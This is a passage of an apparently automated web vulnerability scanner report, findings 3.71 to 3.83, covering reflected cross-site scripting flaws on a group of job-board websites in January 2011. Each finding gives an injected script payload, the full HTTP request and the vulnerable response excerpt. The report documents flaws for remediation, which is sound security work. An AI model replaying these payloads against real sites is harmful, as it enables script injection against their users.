This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?35b65"><script>alert(1)</script>8b14ad25588=1 HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rpbso16tqsrohpa7vs4tao5g00; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.governmentcrossing.com/?35b65"><script>alert(1)</script>8b14ad25588=1">
...[SNIP]...

3.71. http://www.healthcarecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60560"><script>alert(1)</script>134d0f273ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60560"><script>alert(1)</script>134d0f273ed=1 HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vlk8ael6dhgvt7bvpfsh8e5c36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.healthcarecrossing.com/?60560"><script>alert(1)</script>134d0f273ed=1">
...[SNIP]...

3.72. http://www.helpdeskcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca57"><script>alert(1)</script>85f9f0a617e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ca57"><script>alert(1)</script>85f9f0a617e=1 HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5pc34q4kl032si755vlkdonr01; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.helpdeskcrossing.com/?4ca57"><script>alert(1)</script>85f9f0a617e=1">
...[SNIP]...

3.73. http://www.hospitalitycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832b1"><script>alert(1)</script>22eb64144cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?832b1"><script>alert(1)</script>22eb64144cc=1 HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a67315d75br9o1gcjr9is307g2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129156

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hospitalitycrossing.com/?832b1"><script>alert(1)</script>22eb64144cc=1">
...[SNIP]...

3.74. http://www.hrcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb605"><script>alert(1)</script>bb1cbc2fed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fb605"><script>alert(1)</script>bb1cbc2fed9=1 HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ffv3i9vte4g564t23mih093eo2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hrcrossing.com/?fb605"><script>alert(1)</script>bb1cbc2fed9=1">
...[SNIP]...

3.75. http://www.hvaccrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ad5"><script>alert(1)</script>15b6379fa02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c4ad5"><script>alert(1)</script>15b6379fa02=1 HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uipdahmc9kasevm17lp9tie0s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112743

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.hvaccrossing.com/?c4ad5"><script>alert(1)</script>15b6379fa02=1">
...[SNIP]...

3.76. http://www.informationtechnologycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe89"><script>alert(1)</script>2552cabb35c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?abe89"><script>alert(1)</script>2552cabb35c=1 HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=airnfqpaunrhe1ksoustac7no7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133940

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.informationtechnologycrossing.com/?abe89"><script>alert(1)</script>2552cabb35c=1">
...[SNIP]...

3.77. http://www.insurcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf58"><script>alert(1)</script>b6fe24e8d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?eaf58"><script>alert(1)</script>b6fe24e8d54=1 HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d7obm82fb47njpvi2di4tqcjg4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127269

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.insurcrossing.com/?eaf58"><script>alert(1)</script>b6fe24e8d54=1">
...[SNIP]...

3.78. http://www.intellectualpropertycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1e0"><script>alert(1)</script>6b575e61947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa1e0"><script>alert(1)</script>6b575e61947=1 HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ebiu1eg1hbgqgof2fg6sqjau1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118064

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.intellectualpropertycrossing.com/?fa1e0"><script>alert(1)</script>6b575e61947=1">
...[SNIP]...

3.79. http://www.internshipcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b43b"><script>alert(1)</script>cd4dbddd825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4b43b"><script>alert(1)</script>cd4dbddd825=1 HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8s0f63cmgh30cj79o4c02g2hs6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132185

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.internshipcrossing.com/?4b43b"><script>alert(1)</script>cd4dbddd825=1">
...[SNIP]...

3.80. http://www.j2eecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901d9"><script>alert(1)</script>537a79e09a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?901d9"><script>alert(1)</script>537a79e09a3=1 HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4fiue61e3a63g6up9j0v9od9g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111709

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.j2eecrossing.com/?901d9"><script>alert(1)</script>537a79e09a3=1">
...[SNIP]...

3.81. http://www.journalismcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49fb4"><script>alert(1)</script>5e010705692 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49fb4"><script>alert(1)</script>5e010705692=1 HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m2dmhs0p970tp09le2iib1k566; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:15 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:15 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111407

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.journalismcrossing.com/?49fb4"><script>alert(1)</script>5e010705692=1">
...[SNIP]...

3.82. http://www.lawcrossing.com/lcjssearchresults.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde91"><script>alert(1)</script>1010a52da99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99 HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7et0cefrt5l6f61hpkgascchn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92602

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<form id="formmain" name="formmain" Method="POST" action="/lcjssearchresults.php/cde91"><script>alert(1)</script>1010a52da99" onSubmit="return gotopageno();">
...[SNIP]...

3.83. http://www.logisticscrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c0f2"><script>alert(1)</script>581f158145d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2c0f2"><script>alert(1)</script>581f158145d=1 HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:55 GMT
Server: Apache/2.2.3 (Red Hat)
